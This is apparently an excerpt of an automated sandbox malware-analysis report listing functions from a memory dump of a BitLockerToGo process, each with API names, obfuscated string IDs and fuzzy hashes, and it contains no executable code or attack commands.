                                                                                                                                                                  • String ID: #K$M$3S>U$4`[b$4`[b$8WVY$9O:Q$J;O=$W?OA$Y#W%$^/I1$^3F5$_+X-$b7Q9$x'c)
                                                                                                                                                                  • API String ID: 0-3979686712
                                                                                                                                                                  • Opcode ID: 242e73d71674897ff0de7d2f7466db7b99993c4ce9e4d6f755fd803351f66331
                                                                                                                                                                  • Instruction ID: 8c4169c0a550c982652fa0ae754b304477d2d8dec03dc7bc3c32f2b37b956391
                                                                                                                                                                  • Opcode Fuzzy Hash: 242e73d71674897ff0de7d2f7466db7b99993c4ce9e4d6f755fd803351f66331
                                                                                                                                                                  • Instruction Fuzzy Hash: 4602A9B5D00219DFDB14CF94D980BAEBBB2FF09344F288499E505AB352D7329916CFA1
                                                                                                                                                                  Function 02B39500 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 104clipboardCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                  • String ID: 0$1$2
                                                                                                                                                                  • API String ID: 2832541153-1422215283
                                                                                                                                                                  • Opcode ID: 0669f40a51b8be816c63836ec06f8ec9ba5f95734ff07e8386d8a30bd60796c9
                                                                                                                                                                  • Instruction ID: 075f28a1a72bdf185fbfae1ea89f532f375efa242c27805f95192ad64f4c5b38
                                                                                                                                                                  • Opcode Fuzzy Hash: 0669f40a51b8be816c63836ec06f8ec9ba5f95734ff07e8386d8a30bd60796c9
                                                                                                                                                                  • Instruction Fuzzy Hash: 5E410B7150C7819FD302EF68908836EBFE4AB95354F054DADE8D587282C7B98589CBA3
                                                                                                                                                                  Function 02B2CE70 Relevance: 12.8, APIs: 1, Strings: 6, Instructions: 574COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4`[b$4`[b$DtsN$S~Dw$W\T_$sDtB
                                                                                                                                                                  • API String ID: 0-595039062
                                                                                                                                                                  • Opcode ID: 72121219e84101f94433fab46a840096a87e583429cec75afc29777e0dea1029
                                                                                                                                                                  • Instruction ID: 9a3cc2dfdd1daf380dd63a0cb8ee5479572e693ad622e50f8aa915157519b9da
                                                                                                                                                                  • Opcode Fuzzy Hash: 72121219e84101f94433fab46a840096a87e583429cec75afc29777e0dea1029
                                                                                                                                                                  • Instruction Fuzzy Hash: 2A12ABB0908391CFD710AF24E880B2EBBE5FB85384F144DACE1D89B251D775D929CB92
                                                                                                                                                                  Function 02B01000 Relevance: 9.3, Strings: 6, Instructions: 1825COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff
                                                                                                                                                                  • API String ID: 0-854689426
                                                                                                                                                                  • Opcode ID: 9b9ef1e32ecd306f26bdcacc71bb497a936257b814a31b4ae7fca442c4fb4178
                                                                                                                                                                  • Instruction ID: c0d96688393a6b59f6a44f10547f30ec7cfd4c4abbc2c3de75546deedc1992a2
                                                                                                                                                                  • Opcode Fuzzy Hash: 9b9ef1e32ecd306f26bdcacc71bb497a936257b814a31b4ae7fca442c4fb4178
                                                                                                                                                                  • Instruction Fuzzy Hash: B2D2E5716083418FD71ACE28C4D436ABFE2EBC5314F1886ADE8999B3D1D735D949CB82
                                                                                                                                                                  Function 02B015C3 Relevance: 8.0, Strings: 6, Instructions: 462COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: +$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff
                                                                                                                                                                  • API String ID: 0-925659942
                                                                                                                                                                  • Opcode ID: 8e768fa2ed3b0b89e7cdd868252ea8a705e018acbd26946367ab156ab2de4ed9
                                                                                                                                                                  • Instruction ID: 3bb1dff6ab4ccc499d05312542701c2eccae6ccb23a72673ff67fc85717a4e73
                                                                                                                                                                  • Opcode Fuzzy Hash: 8e768fa2ed3b0b89e7cdd868252ea8a705e018acbd26946367ab156ab2de4ed9
                                                                                                                                                                  • Instruction Fuzzy Hash: 5302A17160C7918FC71ACE29C4D426ABFE2AFC5314F098A9DE8D98B391D734D945CB82
                                                                                                                                                                  Function 02B01361 Relevance: 7.9, Strings: 6, Instructions: 363COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff
                                                                                                                                                                  • API String ID: 0-854689426
                                                                                                                                                                  • Opcode ID: 8216c595ffb1464efdfa7e94022c082a497323e88c09e5ce861a091d7f2024b4
                                                                                                                                                                  • Instruction ID: 23cf1205ef061be6725f9e4a6c4c5f788d2a5258e6082ab3df19a9a4ae11ffa8
                                                                                                                                                                  • Opcode Fuzzy Hash: 8216c595ffb1464efdfa7e94022c082a497323e88c09e5ce861a091d7f2024b4
                                                                                                                                                                  • Instruction Fuzzy Hash: 82D1C5716087918FC71ACE29C4D025AFFE2AFD5304F098A9DE8D987392D734D905CB92
                                                                                                                                                                  Function 02B34024 Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 731libraryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(B4EA98FA,00000000,00000800), ref: 02B347F3
                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 02B34917
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Library$FreeLoad
                                                                                                                                                                  • String ID: {qb$B\dn
                                                                                                                                                                  • API String ID: 534179979-574498731
                                                                                                                                                                  • Opcode ID: 831d3a95808a9052d667c20ede8f1b66cdebff3e8939a4260fda2d87eea7157c
                                                                                                                                                                  • Instruction ID: db7714012277c2641228eca3a7e212a380b444dc691ea3d29252d700ad4d889d
                                                                                                                                                                  • Opcode Fuzzy Hash: 831d3a95808a9052d667c20ede8f1b66cdebff3e8939a4260fda2d87eea7157c
                                                                                                                                                                  • Instruction Fuzzy Hash: A1423670405B808AD7628F35C894BE3BBF5EF16705F48489DD4EE8B282DB39B449DB60
                                                                                                                                                                  Function 02B34322 Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 722libraryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(B4EA98FA,00000000,00000800), ref: 02B347F3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID: vw!${qb
                                                                                                                                                                  • API String ID: 1029625771-3468532927
                                                                                                                                                                  • Opcode ID: bb9362e9c7015a291dc000171bfec1bb2159ea84b6c242bf2207b5883384a5f8
                                                                                                                                                                  • Instruction ID: acd7e994a9e4359389ce4b9f2f3a23d7a3f715e92d4969a7238542d2b190cd1b
                                                                                                                                                                  • Opcode Fuzzy Hash: bb9362e9c7015a291dc000171bfec1bb2159ea84b6c242bf2207b5883384a5f8
                                                                                                                                                                  • Instruction Fuzzy Hash: B0424970405B808AD7628B35C854BE7BBF5AF17305F48489DD4EE8B282DB39B449CF64
                                                                                                                                                                  Function 02B33609 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 333COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 40F$$87#&$z\B
                                                                                                                                                                  • API String ID: 0-1376844939
                                                                                                                                                                  • Opcode ID: 960264bb65d3b8a80169893ae301b6ead8e6b1155fe870c42a106b380011753a
                                                                                                                                                                  • Instruction ID: 030c3ad2653173964a7cdb0f5267a0de364fef524249d0abf6c821380210a039
                                                                                                                                                                  • Opcode Fuzzy Hash: 960264bb65d3b8a80169893ae301b6ead8e6b1155fe870c42a106b380011753a
                                                                                                                                                                  • Instruction Fuzzy Hash: 32C18070108B418BE3A68F35C454BA3BBE1AF02344F4489DDD4EBCB281DF3AA489CB50
                                                                                                                                                                  Function 02B330F3 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 278COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 40F$$87#&$z\B
                                                                                                                                                                  • API String ID: 0-1376844939
                                                                                                                                                                  • Opcode ID: e46f901e1fc69bc99669a0b685981e4b1ad1234c7d8d99ee0445b54e9d904d32
                                                                                                                                                                  • Instruction ID: 71e0958da944234b0c863137f413761810d5721816497b7bf8bedbda965712fa
                                                                                                                                                                  • Opcode Fuzzy Hash: e46f901e1fc69bc99669a0b685981e4b1ad1234c7d8d99ee0445b54e9d904d32
                                                                                                                                                                  • Instruction Fuzzy Hash: FDA15170504B818AE7668F35C454BE3BBE5BF06304F9489DDD4EF9B282DB3AA449CB50
                                                                                                                                                                  Function 02B10C00 Relevance: 6.7, Strings: 5, Instructions: 414COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: +`bc$M#N]$PcBe$\_$k_pa
                                                                                                                                                                  • API String ID: 0-3128988097
                                                                                                                                                                  • Opcode ID: d5bff8b75e45a714e76493896b70332690af7a3ba29928dc527a0b32a1ec5450
                                                                                                                                                                  • Instruction ID: c1cfb7eee4903c286ae53cd88f7e4124cbac0060d0703daf39fe68bef973657c
                                                                                                                                                                  • Opcode Fuzzy Hash: d5bff8b75e45a714e76493896b70332690af7a3ba29928dc527a0b32a1ec5450
                                                                                                                                                                  • Instruction Fuzzy Hash: AAF140B4408380AFD360AF54D884B6FBBF5EB86785F909C5CF6CA9B250C7748895CB52
                                                                                                                                                                  Function 02B0F930 Relevance: 6.6, Strings: 5, Instructions: 381COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: *DR*$*[ZY$\$fpgn$sq
                                                                                                                                                                  • API String ID: 0-1345137181
                                                                                                                                                                  • Opcode ID: b0e0b37cf9a54190e05a1f4f324d89b709fe10839611dcc791abda44e11144d4
                                                                                                                                                                  • Instruction ID: 04964c30f5ba1cc7bfc8a28f66b0d157a9cbd093dd68b9639fc1dd2f6e521ec1
                                                                                                                                                                  • Opcode Fuzzy Hash: b0e0b37cf9a54190e05a1f4f324d89b709fe10839611dcc791abda44e11144d4
                                                                                                                                                                  • Instruction Fuzzy Hash: 55D17A7060C3808BD322DF18D09062EFFE5EF91648F58499CE5D58B692DB35C909CBA7
                                                                                                                                                                  Function 02B12CB4 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 307COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Uninitialize
                                                                                                                                                                  • String ID: C@rH$E|IH$OM
                                                                                                                                                                  • API String ID: 3861434553-1956597384
                                                                                                                                                                  • Opcode ID: 41a807b18abb4afed97e5d88dc2d69861fab9f62eda46105a6304b04ad1696ce
                                                                                                                                                                  • Instruction ID: 9db3d732372e0863ea556a18c17b4c6fc33d9dfb34d95457cb9ace88a6a2269f
                                                                                                                                                                  • Opcode Fuzzy Hash: 41a807b18abb4afed97e5d88dc2d69861fab9f62eda46105a6304b04ad1696ce
                                                                                                                                                                  • Instruction Fuzzy Hash: 6EB127B44052928FD7258F28C090A26FFB1FF1A305BA8598DD8C28F752D336E496CF91
                                                                                                                                                                  Function 02B01311 Relevance: 5.9, Strings: 4, Instructions: 935COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 0$0$0$i
                                                                                                                                                                  • API String ID: 0-3333316649
                                                                                                                                                                  • Opcode ID: 528ccafec99ee7277aab2b1fa878f92d19aeb91ef0e3cf47921118c7c04cb000
                                                                                                                                                                  • Instruction ID: 61b7263c0080fff678e845989a8e37350bd33b0565da72fcacc75b231345adc6
                                                                                                                                                                  • Opcode Fuzzy Hash: 528ccafec99ee7277aab2b1fa878f92d19aeb91ef0e3cf47921118c7c04cb000
                                                                                                                                                                  • Instruction Fuzzy Hash: 3672AF71A083418FD716CE28C4D476ABFE2EBC4348F188AADE8D597391D774D949CB82
                                                                                                                                                                  Function 02B29298 Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 616COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DrivesLogical
                                                                                                                                                                  • String ID: |~$IK
                                                                                                                                                                  • API String ID: 999431828-127286875
                                                                                                                                                                  • Opcode ID: 135b5c0f34b75bcc2fe8736eaf7ee9505cdf1b61d594ea989b7369e63b2e5f39
                                                                                                                                                                  • Instruction ID: 4396fbc7c0025260a735db0dfd10c3c74ad9a4d910799f62022f5f6501078507
                                                                                                                                                                  • Opcode Fuzzy Hash: 135b5c0f34b75bcc2fe8736eaf7ee9505cdf1b61d594ea989b7369e63b2e5f39
                                                                                                                                                                  • Instruction Fuzzy Hash: 983277B490175AEFCB10CF95D8806AEBBB1FF06344F601A48E469AB781D331E525CFA5
                                                                                                                                                                  Function 02B30485 Relevance: 5.4, Strings: 4, Instructions: 419COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: "'Q[$4`[b$T\/l$r.*F
                                                                                                                                                                  • API String ID: 0-2318415235
                                                                                                                                                                  • Opcode ID: e4a35f23eeb7531a45a5cc2e9e4aaca7b777b38ef9aa834abcde1d1546c58bcd
                                                                                                                                                                  • Instruction ID: 46037253fb1928fb0d35e62b61c842bd3301fa55c61d98c2d2066ff4bd14e9bd
                                                                                                                                                                  • Opcode Fuzzy Hash: e4a35f23eeb7531a45a5cc2e9e4aaca7b777b38ef9aa834abcde1d1546c58bcd
                                                                                                                                                                  • Instruction Fuzzy Hash: 8FD1BE71908390DFD302AF28D49062ABBE6EF86354F098E9CE5D58B392D375D914CF92
                                                                                                                                                                  Function 02B27650 Relevance: 5.4, Strings: 4, Instructions: 414COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 0325$47$4`[b$?1
                                                                                                                                                                  • API String ID: 0-310077157
                                                                                                                                                                  • Opcode ID: b5cf232dd716eeea5b570c520a34a11724a3ade5283b7d8424f0fc4dd6ce1bd9
                                                                                                                                                                  • Instruction ID: 3ae42c1057717ab73f276fe3a133e3d0e91f82a4c4fce44a866523aaa1580865
                                                                                                                                                                  • Opcode Fuzzy Hash: b5cf232dd716eeea5b570c520a34a11724a3ade5283b7d8424f0fc4dd6ce1bd9
                                                                                                                                                                  • Instruction Fuzzy Hash: 70C1D1719083109BD711EF14D881A2BF7F5EF86314F08099CE5C99B251EB35D948DBAA
                                                                                                                                                                  Function 02B4A410 Relevance: 4.4, Strings: 3, Instructions: 610COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 3016?<=2$?<=2$lx>1
                                                                                                                                                                  • API String ID: 0-112522767
                                                                                                                                                                  • Opcode ID: 00f60dd9f00b3c6192f6cd15050757ca71086ae847e5f6fc9367bc53f580daf9
                                                                                                                                                                  • Instruction ID: 175a5a86c5b31a3664067d626c4ddbe0c716fa4451e0483a0a3d27adc82b85b9
                                                                                                                                                                  • Opcode Fuzzy Hash: 00f60dd9f00b3c6192f6cd15050757ca71086ae847e5f6fc9367bc53f580daf9
                                                                                                                                                                  • Instruction Fuzzy Hash: EE02FC71A48350CFD704DF28D4A062EBBE2EF8A315F498C6DE5DA8B241DB35E914CB52
                                                                                                                                                                  Function 02B4A2F0 Relevance: 4.3, Strings: 3, Instructions: 581COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 3016?<=2$?<=2$lx>1
                                                                                                                                                                  • API String ID: 0-112522767
                                                                                                                                                                  • Opcode ID: 1058b93e9bb4aa36ac6fe591012a07973b1e35f0b43faf953396d8afd173d6cc
                                                                                                                                                                  • Instruction ID: ef1f74e0f262134a9c96bd690785c389dffe0eda2e441d80abf395c10666f621
                                                                                                                                                                  • Opcode Fuzzy Hash: 1058b93e9bb4aa36ac6fe591012a07973b1e35f0b43faf953396d8afd173d6cc
                                                                                                                                                                  • Instruction Fuzzy Hash: 6E02DB71A48351CFC704DF28E4E062EB7E2FB89316F49886CE5998B341DB35E924CB52
                                                                                                                                                                  Function 02B087B0 Relevance: 4.1, Strings: 3, Instructions: 396COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: )$)$IEND
                                                                                                                                                                  • API String ID: 0-588110143
                                                                                                                                                                  • Opcode ID: bc2e7137e936fe567fab58cb612a1157f7fb9a1e8d8d6c9eac52230d1799b659
                                                                                                                                                                  • Instruction ID: cb2e9819ac46601ec1ecb99555c54d43e732bb91f8533a1a365dfcfe90a60e28
                                                                                                                                                                  • Opcode Fuzzy Hash: bc2e7137e936fe567fab58cb612a1157f7fb9a1e8d8d6c9eac52230d1799b659
                                                                                                                                                                  • Instruction Fuzzy Hash: 2CE1ABB1A087029FD311DF28D89471ABBE1BB84314F044A6DE5999B3C1E775EA18CBC6
                                                                                                                                                                  Function 02B4A740 Relevance: 4.1, Strings: 3, Instructions: 377COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 3016?<=2$?<=2$lx>1
                                                                                                                                                                  • API String ID: 0-112522767
                                                                                                                                                                  • Opcode ID: 09e5c2f2b2560b7bddb9a87ac9d3e44de4fb14a9bc92a1f3ad72e067c75fe9a7
                                                                                                                                                                  • Instruction ID: 5f25d46183a7a1bc3775cc8c6242cc2148d640d45d41e1443c5016663d05c44e
                                                                                                                                                                  • Opcode Fuzzy Hash: 09e5c2f2b2560b7bddb9a87ac9d3e44de4fb14a9bc92a1f3ad72e067c75fe9a7
                                                                                                                                                                  • Instruction Fuzzy Hash: 3FB10D30608350DFD304EF28D4A062EB7E2EB8A345F498C6DE5D68B241D731E924DB52
                                                                                                                                                                  Function 02B34E6E Relevance: 4.1, Strings: 3, Instructions: 368COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: .L6y$ESBT$U`2|
                                                                                                                                                                  • API String ID: 0-4146030649
                                                                                                                                                                  • Opcode ID: 34ae5c42bdabccc08070b76c358dcc50762097a46f42e9119c044c4ad8364f29
                                                                                                                                                                  • Instruction ID: 26ce10c5131bcc2b723abbd38797fa9237e75f60668789a5d5f780c12bcbd964
                                                                                                                                                                  • Opcode Fuzzy Hash: 34ae5c42bdabccc08070b76c358dcc50762097a46f42e9119c044c4ad8364f29
                                                                                                                                                                  • Instruction Fuzzy Hash: ABC12A74504B808ED7B6CF358490BE3FBE1AF16304F98899DD4EE87652DB36A489CB50
                                                                                                                                                                  Function 02B10BD3 Relevance: 4.1, Strings: 3, Instructions: 333COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: +`bc$M#N]$\_
                                                                                                                                                                  • API String ID: 0-666683478
                                                                                                                                                                  • Opcode ID: 6beb2936be60f9c4f22af2eae2c0f7f77d719d885cb9b07a491ad6919d633c63
                                                                                                                                                                  • Instruction ID: 24cfccd244fa8af865f6a4d6c2d0015ea661fbe70186b0b88dbb046653a9b171
                                                                                                                                                                  • Opcode Fuzzy Hash: 6beb2936be60f9c4f22af2eae2c0f7f77d719d885cb9b07a491ad6919d633c63
                                                                                                                                                                  • Instruction Fuzzy Hash: F3B16774508390AFD350AF54D884B2BBBF8EF8A395F945C6CF9898B250C735D864CB52
                                                                                                                                                                  Function 02B3314F Relevance: 4.1, Strings: 3, Instructions: 328COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: .L6y$ESBT$U`2|
                                                                                                                                                                  • API String ID: 0-4146030649
                                                                                                                                                                  • Opcode ID: f8914383e5582bcce52400e1f09ac958298319f60289094f98d4eae82fbe7d54
                                                                                                                                                                  • Instruction ID: ead229b348d19efc80aa246ac52145bdb9b19f5c7f732503825fcd590b46da85
                                                                                                                                                                  • Opcode Fuzzy Hash: f8914383e5582bcce52400e1f09ac958298319f60289094f98d4eae82fbe7d54
                                                                                                                                                                  • Instruction Fuzzy Hash: 2EB15A74504B808ED7768F398490BA3FBF1BF16304F98499DD4EA87692DB36A449CB50
                                                                                                                                                                  Function 02B47CB5 Relevance: 4.1, Strings: 3, Instructions: 305COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
